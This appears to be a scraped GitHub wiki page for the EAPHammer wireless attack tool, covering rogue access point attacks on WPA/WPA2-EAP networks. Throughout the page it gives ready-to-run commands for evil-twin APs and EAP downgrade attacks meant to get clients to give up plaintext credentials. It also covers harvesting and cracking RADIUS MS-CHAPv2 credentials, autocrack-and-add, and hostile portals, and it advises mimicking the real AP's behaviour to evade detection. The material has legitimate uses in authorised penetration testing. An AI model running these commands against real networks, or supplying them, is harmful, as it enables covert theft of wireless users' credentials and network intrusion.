-
Notifications
You must be signed in to change notification settings - Fork 313
VIII. Attacking WPA EAP and WPA2 EAP Networks
To execute a rogue access point attack against a network that uses WPA2-EAP, just use the --auth
flag as shown below:
./eaphammer -i wlan0 \
-e mysecurenetwork \
--auth wpa-eap
By default, eaphammer will use WPA2 rather than WPA. However, you can specify the WPA version manually using the ---wpa-version
flag as shown below:
# use WPA2
./eaphammer -i wlan0 \
-e equihax \
--auth wpa-eap \
--wpa-version 2
# use WPA
./eaphammer -i wlan0 \
-e pwnera \
--auth wpa-eap \
--wpa-version 1
There is no need to specify an EAP type, as eaphammer will negotiate the EAP type on a victim-by-victim basis as they connect to the rogue AP. EAPHammer will automatically use the least secure EAP type supported by the client in order to make cracking attempts easier.
For the most part, attacks against WPA2-EAP networks require creds in order to work. The exception for this that you don't need creds to steal creds (because that's just redundant). The reason for this is that the more advanced forms of WPA2-EAP use MS-CHAPv2, which requires mutual authentication between the wireless client and the access point. In other words, if you cannot prove knowledge of the victim's password, you will not be able to get the victim to fully associate with you.
Fortunately, you have a couple of options available to you. The first option is to simply steal a bunch of RADIUS creds using the --creds flag (see II. Stealing RADIUS Credentials Using EAPHammer for instructions on how to do this. You can then crack the creds offline, then return and finish the attack later. This method will work regardless of the strength of the user's password due to weaknesses found in MS-CHAPv2 (see Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2 | DC20 | Moxie Marlinspike and David Hulton). You will also have to add the cracked RADIUS creds to EAPHammer's database. Please refer to IX. EAPHammer User Database for instructions on how to do this.
For victims with weak passwords, you can use the --autocrack flag in order to perform an auto crack 'n add attack (see VIII.3 - Using AutoCrack for usage instructions, see Improvements In Rogue AP Attacks - MANA 1/2 for details on how this attack works).
EAPHammer supports the ability to perform a variety of EAP Downgrade attacks (including the GTC Downgrade attack) to attempt to force client devices to surrender plaintext credentials.
This is actually a pretty lengthy topic, so please refer to the following blog post if you want to understand more about this functionality:
EAPHammer's default bevahior is to suggest the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
EAPHammer first attempts to downgrade to GTC, and then immediately falls back to stronger EAP methods if the attempt fails. This balanced approach is designed to maximize impact while minimizing the risk of protracted EAP negotiations.
To execute this attack, run EAPHammer with the --negotiate balanced
flag:
./eaphammer --interface wlan0 \
--negotiate balanced \
--auth wpa-eap \
--essid example \
--creds
Alternatively, just omit the --negotiate
flag altogether:
./eaphammer --interface wlan0 \
--auth wpa-eap \
--essid example \
--creds
Should you want to perform a full EAP downgrade attack, you can do so using the --negotiate weakest
flag:
./eaphammer --interface wlan0 \
--negotiate weakest \
--auth wpa-eap \
--essid example \
--creds
This will instruct EAPHammer to suggest the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS
Keep in mind that using this option may lead to long EAP negotiation times, which can be detrimental to the overall effectiveness of your attack.
In this mode, EAPHammer proposes the EAP methods that are most likely to succeed first:
./eaphammer --interface wlan0 \
--negotiate speed \
--auth wpa-eap \
--essid example \
--creds
This will instruct EAPHammer to suggest the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,GTC,TTLS-PAP,TTLS-MSCHAP,MD5
Use this mode if you have trouble getting clients to finish the EAP authentication process using the default mode.
To execute @W00Tock's highly efficient GTC downgrade implementation, use the --negotiate gtc-downgrade
flag:
./eaphammer --interface wlan0 \
--negotiate gtc-downgrade \
--auth wpa-eap \
--essid example \
--creds
This will instruct EAPHammer to suggest the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP [ver=1]
# Phase 2 (inner authentication)
GTC
See https://twitter.com/w00tock/status/1019251419310972930 for source of this attack.
To manually control which EAP methods are used by EAPHammer, as well as the order in which they are suggested to the client, use the --negotiate manual
flag in conjuction with the --phase-2-methods
and --phase-1-methods
flags:
./eaphammer --interface wlan0 \
--negotiate manual \
--phase-1-methods PEAP,TTLS \
--phase-2-methods MSCHAPV2,GTC,TTLS-MSCHAP \
--auth wpa-eap \
--essid example \
--creds
Manual control over the EAP negotiation process is useful in situations where the access point's behavior must be mimicked in order to evade detection.
To use your own EAP User file, instead of relying on EAPHammer's automated processes, run EAPHammer with the --eap-user-file
flag:
./eaphammer --interface wlan0 \
--eap-user-file /tmp/i-like-to-write-things-by-hand.eap_user \
--auth wpa-eap \
--essid painful \
--creds
"Autocrack 'n add" is a technique introduced by Dominic White and Ian de Villiers in 2014 which was first introduced into their Mana Toolkit. When autocrack ‘n add is used, the captured MS-CHAPv2 challenge and response is immediately sent to a cracking rig (local or remote) before the authentication response is sent to the victim. The cracked credentials are then appended to the end of the eap_user file. If the challenge and response are cracked fast enough, the cracked credentials are added to eap_user file before hostapd attempts to retrieve them. Even if the challenge and response cannot be cracked in time, the attack will succeed when the client attempts to reauthenticate provided the password can be cracked within a short period of time. When weak passwords are used, this process can take seconds. See the original Improvements In Rogue AP Attacks - MANA 1/2 blog post for a more detailed explanation of this attack.
To use EAPHammer's builtin AutoCrack capability, just include the --autocrack flag with whatever attack you are attempting to perform. For example, to enable AutoCrack while performing a Hostile Portal attack, you can use the following command:
./eaphammer -i wlan0 \
--essid EvilC0rp \
-c 6 \
--auth wpa-eap \
--hostile-portal \
--autocrack
Note: At this time, EAPHammer only supports performing an autocrack 'n add using EAPHammer's internal hash cracking capability. Unless you're using a cracking rig to run EAPHammer, this is going to be very slow. Support for sending hashes to a remote cracking rig will be added in the future.
Note: Hostapd loads known usernames and passwords into memory at startup. This means that you'll have to manually restart your rogue AP every time new creds captured using autocrack 'n add. This will result in a delay of few seconds, and will also require you to personally supervise your rogue AP (which you should probably be doing anyways if you care about tradecraft...). Fixing this issue would require fundamental changes to the way hostapd works, which the developer has zero interest in implementing or maintaining.
-
- XIV.1 - Interactive Mode
-
XIV.2 - Creating Certificates
--cert-wizard create
-
XIV.3 - Importing Certificates and Keys
--cert-wizard import
- XIV.4 - Listing Previously Imported or Created Certificates
--cert-wizard list
- XIV.5 - Regenerating Diffie Hellman (DH) Parameters
--cert-wizard dh
- XIV.6 - Overriding EAPHammer's Static Configuration